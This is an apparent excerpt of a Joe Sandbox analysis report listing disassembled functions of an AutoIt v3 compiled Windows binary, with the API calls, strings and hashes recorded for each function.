                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                  • String ID:
                                                                  • API String ID: 2695905019-0
                                                                  • Opcode ID: 9156530011793dd9707079ad5bb787af850af5e90eab2a2603f338c73b2284b4
                                                                  • Instruction ID: c917b509bfaf381f4ab8c46f7dcafe5d758b9c9cd417ece9e5954d806ddf42fb
                                                                  • Opcode Fuzzy Hash: 9156530011793dd9707079ad5bb787af850af5e90eab2a2603f338c73b2284b4
                                                                  • Instruction Fuzzy Hash: 07F0A07081091057931477BCAC0D8AE77AFAE82335B504701F93AC22E0E7B99A958695
                                                                  Function 0067E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LocalTime
                                                                  • String ID: %.3d$X64
                                                                  • API String ID: 481472006-1077770165
                                                                  • Opcode ID: 2d0affdf7879de8d62392eac0b8da2a83873ceee51ebb24c8e29cb7940df0b4a
                                                                  • Instruction ID: b4003cb333e1e6e5778058accf61c4a4958728aa30485878a3154f5febb2276d
                                                                  • Opcode Fuzzy Hash: 2d0affdf7879de8d62392eac0b8da2a83873ceee51ebb24c8e29cb7940df0b4a
                                                                  • Instruction Fuzzy Hash: DED012B1C04108EACBC097909C48CB973BFAB1C300F10C4A6FA0A91041F6319A4D9721
                                                                  Function 00652992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00652A8A
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00652A94
                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00652AA1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                  • String ID:
                                                                  • API String ID: 3906539128-0
                                                                  • Opcode ID: 4a69f703fc67b9a8925a251a8f48fec43c4f26f35344defe2d1a605a3ac751b7
                                                                  • Instruction ID: e96ab9ffdc0eb4d9dc1b1ad740605b1be78014a4960329b338c6418914b9b108
                                                                  • Opcode Fuzzy Hash: 4a69f703fc67b9a8925a251a8f48fec43c4f26f35344defe2d1a605a3ac751b7
                                                                  • Instruction Fuzzy Hash: 7731D47490122D9BCB61DF68D9897DCBBB9AF08310F5042DAE90CA7261E7309F858F45
                                                                  Function 00682010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0064014B: __CxxThrowException@8.LIBVCRUNTIME ref: 006409D8
                                                                    • Part of subcall function 0064014B: __CxxThrowException@8.LIBVCRUNTIME ref: 006409F5
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0068205A
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00682087
                                                                  • GetLastError.KERNEL32 ref: 00682097
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                  • String ID:
                                                                  • API String ID: 577356006-0
                                                                  • Opcode ID: e07e5b685a084c702a3f661ebc9237512d3f66b23c8fcc63c0d5840d67449b26
                                                                  • Instruction ID: e795ec78351e713b676a0a0d84bd3011c8b540b1771087774aaaf9bf346a2ca9
                                                                  • Opcode Fuzzy Hash: e07e5b685a084c702a3f661ebc9237512d3f66b23c8fcc63c0d5840d67449b26
                                                                  • Instruction Fuzzy Hash: D511BFB1400205AFE728AF54DC86D6BB7BAEB08714B20862EE44657251EB70BC41CB24
                                                                  Function 00645058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,?,0064502E,?,006E98D8,0000000C,00645185,?,00000002,00000000), ref: 00645079
                                                                  • TerminateProcess.KERNEL32(00000000,?,0064502E,?,006E98D8,0000000C,00645185,?,00000002,00000000), ref: 00645080
                                                                  • ExitProcess.KERNEL32 ref: 00645092
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentExitTerminate
                                                                  • String ID:
                                                                  • API String ID: 1703294689-0
                                                                  • Opcode ID: 0dad9e59fd80f2d168394419b27a30d49657182d757e39b17ce8aeb373408cbd
                                                                  • Instruction ID: dab816e7c0ff396b91f43d8200d936b39ee6d458f56b2ae3240afa2b3871f721
                                                                  • Opcode Fuzzy Hash: 0dad9e59fd80f2d168394419b27a30d49657182d757e39b17ce8aeb373408cbd
                                                                  • Instruction Fuzzy Hash: 04E08C75000508AFCF216F54CD08E983BABEF11B81F004518F80A8A233EB35DD82CBC1
                                                                  Function 0067E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 0067E664
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: NameUser
                                                                  • String ID: X64
                                                                  • API String ID: 2645101109-893830106
                                                                  • Opcode ID: 9d91d10c17ed0daa8dbb68d70a80693aba3e041c9e82333fe0e1f8cb303ab2dd
                                                                  • Instruction ID: f5cccd14381b66eaf62d97a098bb45351e2d6f9b81074bf59721f1d450ae4c6a
                                                                  • Opcode Fuzzy Hash: 9d91d10c17ed0daa8dbb68d70a80693aba3e041c9e82333fe0e1f8cb303ab2dd
                                                                  • Instruction Fuzzy Hash: CAD0C9F480111DEACB80DF50EC88DDA73BDBB08304F104691F106A2040D73095498B20
                                                                  Function 006941FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,006A52EE,?,?,00000035,?), ref: 00694229
                                                                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,006A52EE,?,?,00000035,?), ref: 00694239
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFormatLastMessage
                                                                  • String ID:
                                                                  • API String ID: 3479602957-0
                                                                  • Opcode ID: bb5b7e4902e6ace52106bbdd8b8b1ad3d8b4aabb238cafe20069f42ac9e4dfe1
                                                                  • Instruction ID: 154676adc95a83894d1db7a82e45d5d5d6fbbe716d22fc60de9f323f9c7038df
                                                                  • Opcode Fuzzy Hash: bb5b7e4902e6ace52106bbdd8b8b1ad3d8b4aabb238cafe20069f42ac9e4dfe1
                                                                  • Instruction Fuzzy Hash: 81F0E5706002256AEB205765AC4DFEB366FFFC5B61F000279F605D2281D9709E41C7B0
                                                                  Function 00681A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00681B48), ref: 00681A20
                                                                  • CloseHandle.KERNEL32(?,?,00681B48), ref: 00681A35
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                  • String ID:
                                                                  • API String ID: 81990902-0
                                                                  • Opcode ID: 50bd2fed38e630a2cdff82fdb1d368d41cdcd85da90aab85e4235b9478a1ac30
                                                                  • Instruction ID: a083dbb813a913a8dfd7a936f8fbc89b78a9d41c4524171d2e4c0e9fbf317d03
                                                                  • Opcode Fuzzy Hash: 50bd2fed38e630a2cdff82fdb1d368d41cdcd85da90aab85e4235b9478a1ac30
                                                                  • Instruction Fuzzy Hash: CDE04F72004610AFF7252B50FC05F7677EAEB04320F14892DF59585470EB726C91DB14
                                                                  Function 0069F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • BlockInput.USER32(00000001), ref: 0069F51A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: BlockInput
                                                                  • String ID:
                                                                  • API String ID: 3456056419-0
                                                                  • Opcode ID: 11324a2284d3aa3f3d1887ec1d9b6affce255d230cbe8b89f08388f108cd86fd
                                                                  • Instruction ID: 08c5a3092e28400f2ea537ded61876dcd6ff355fbfdf5ae2486bb5c5e7c9ca21
                                                                  • Opcode Fuzzy Hash: 11324a2284d3aa3f3d1887ec1d9b6affce255d230cbe8b89f08388f108cd86fd
                                                                  • Instruction Fuzzy Hash: 02E048313102145FC750AF69E804D9AF7DDAFA4771F018429F849C7351D670F9418B95
                                                                  Function 0068EC6C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0068EC95
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: mouse_event
                                                                  • String ID:
                                                                  • API String ID: 2434400541-0
                                                                  • Opcode ID: 6567666cf24652049ecdd5f0f477a05ee2e110a7727202aca92d29cfa56710c1
                                                                  • Instruction ID: da5b84a7257f757522a0045bdbef6d20da02253b5330b40ff555994cf4d93eda
                                                                  • Opcode Fuzzy Hash: 6567666cf24652049ecdd5f0f477a05ee2e110a7727202aca92d29cfa56710c1
                                                                  • Instruction Fuzzy Hash: 32D05EB69D022079E91C3A3C8F2FFB6090BE302741F80534DF122D9A95E4C399419321
                                                                  Function 00640D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0064075E), ref: 00640D4A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: ecfb24bf87ba100a688548cb38fe8748e938a93ac59d6cdde063e43e33939faf
                                                                  • Instruction ID: 20dbfe665368f07b3438510c7990b96f0bb0695d7dc9467445b36d60140515e3
                                                                  • Opcode Fuzzy Hash: ecfb24bf87ba100a688548cb38fe8748e938a93ac59d6cdde063e43e33939faf
                                                                  • Instruction Fuzzy Hash:
                                                                  Function 006A353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 006A358D
                                                                  • DeleteObject.GDI32(00000000), ref: 006A35A0
                                                                  • DestroyWindow.USER32 ref: 006A35AF
                                                                  • GetDesktopWindow.USER32 ref: 006A35CA
                                                                  • GetWindowRect.USER32(00000000), ref: 006A35D1
                                                                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 006A3700
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 006A370E
                                                                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A3755
                                                                  • GetClientRect.USER32(00000000,?), ref: 006A3761
                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006A379D
                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A37BF
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A37D2
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A37DD
                                                                  • GlobalLock.KERNEL32(00000000), ref: 006A37E6
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A37F5
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 006A37FE
                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A3805
                                                                  • GlobalFree.KERNEL32(00000000), ref: 006A3810
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A3822
                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,006C0C04,00000000), ref: 006A3838
                                                                  • GlobalFree.KERNEL32(00000000), ref: 006A3848
                                                                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 006A386E
                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 006A388D
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A38AF
                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A3A9C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                  • API String ID: 2211948467-2373415609
                                                                  • Opcode ID: 4a1c114aa66a00b433fc7bea8d86fc9b03ce60c0e9b7012a96007ef6fe7cea5b
                                                                  • Instruction ID: 45d99989126f1f9e57a1b28de0641ae0a95cee0184d38626267dd4f7ccb7ac92
                                                                  • Opcode Fuzzy Hash: 4a1c114aa66a00b433fc7bea8d86fc9b03ce60c0e9b7012a96007ef6fe7cea5b
                                                                  • Instruction Fuzzy Hash: 570282B2900215AFDB14DF68DC49EAE7BBAFF49310F048258F9159B2A0DB74AD41CF60
                                                                  Function 00621625 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 480windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(?,?), ref: 006216B4
                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00662B07
                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00662B40
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00662F85
                                                                    • Part of subcall function 00621802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00621488,?,00000000,?,?,?,?,0062145A,00000000,?), ref: 00621865
                                                                  • SendMessageW.USER32(?,00001053), ref: 00662FC1
                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00662FD8
                                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00662FEE
                                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00662FF9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                  • String ID: 0$(o$(o$(o
                                                                  • API String ID: 2760611726-1013658127
                                                                  • Opcode ID: 7c5897ae1d81f3aa2ad8e60749c2dd9da2c7865a59f3fe98e47f8a0f4ad097c9
                                                                  • Instruction ID: da73fcdb277a36ceae25732c4dd75047fd279c04cf5d22d8ee2276dda41d64e6
                                                                  • Opcode Fuzzy Hash: 7c5897ae1d81f3aa2ad8e60749c2dd9da2c7865a59f3fe98e47f8a0f4ad097c9
                                                                  • Instruction Fuzzy Hash: 5412CB30204A12AFC725CF14D8A8BAABBE3FF55300F185569F4959B261C772E882CF91
                                                                  Function 006A316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000), ref: 006A319B
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006A32C7
                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 006A3306
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 006A3316
                                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 006A335D
                                                                  • GetClientRect.USER32(00000000,?), ref: 006A3369
                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 006A33B2
                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006A33C1
                                                                  • GetStockObject.GDI32(00000011), ref: 006A33D1
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 006A33D5
                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 006A33E5
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006A33EE
                                                                  • DeleteDC.GDI32(00000000), ref: 006A33F7
                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006A3423
                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 006A343A
                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 006A347A
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 006A348E
                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 006A349F
                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 006A34D4
                                                                  • GetStockObject.GDI32(00000011), ref: 006A34DF
                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006A34EA
                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 006A34F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                  • API String ID: 2910397461-517079104
                                                                  • Opcode ID: 8ec89ecd653a52299679393f5bba855ece953d10b1ecb0305a19b075e9a89286
                                                                  • Instruction ID: ad4dce679bbe5db58f2f2a73d36c44f4b61989324942bf6a2f29aa13373b46ad
                                                                  • Opcode Fuzzy Hash: 8ec89ecd653a52299679393f5bba855ece953d10b1ecb0305a19b075e9a89286
                                                                  • Instruction Fuzzy Hash: EAB14FB1A40215AFEB14DFA8DC45FAE7BBAEB09710F004218F915EB290D774AD40CF94
